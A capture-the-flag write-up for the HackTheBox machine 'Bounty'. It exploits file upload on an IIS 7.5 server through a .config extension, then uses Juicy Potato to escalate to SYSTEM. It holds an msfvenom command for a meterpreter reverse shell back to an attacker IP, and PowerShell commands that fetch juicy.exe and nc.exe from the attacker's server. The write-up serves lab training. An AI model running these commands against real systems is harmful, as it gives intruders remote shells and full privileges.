HackTheBox - Bounty

Nmap scan results (Basic and all port)

Even all port scan gave us the single port to be opened i.e port 80.

Web-server Running: Microsoft IIS HTTPd 7.5

Gobuster scan with aspx as file extension

gobuster dir -u http://bounty.htb/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -o gobuster-scan.out -x aspx

We have file upload functionality present at /transfer.aspx

I tried uploading various file extensions, but we can also we BURP Suite's Intruder Tab to get the Valid File Extension.

Running ASP Code using .config as the extension

Valid File Extension that can be uploaded: .config

The file is running ASP Code and after uploading, the machine should ping us back.

Creating reverse shell script using msfvenom

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe > shell.exe

Running the script by editing web.config file

Also don't forget to setup the multi handler in msfconsole.

Exploiting Juicy Potato Attack

SeImpersonatePrivilege is Enabled that means we can try Juicy Potato attack eventually giving us System Privileges. whoami /priv

References: https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

You can download the JuicyPotato script from here.

powershell "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.5:8000/juicy.exe','juicy.exe')"
powershell "IEX(New-Object Net.WebClient).DownloadFile('http://10.10.14.5:8000/nc.exe','nc.exe')"

PreviousHackTheBox - Optimum NextHackTheBox - Granny

Last updated 4 years ago

Was this helpful?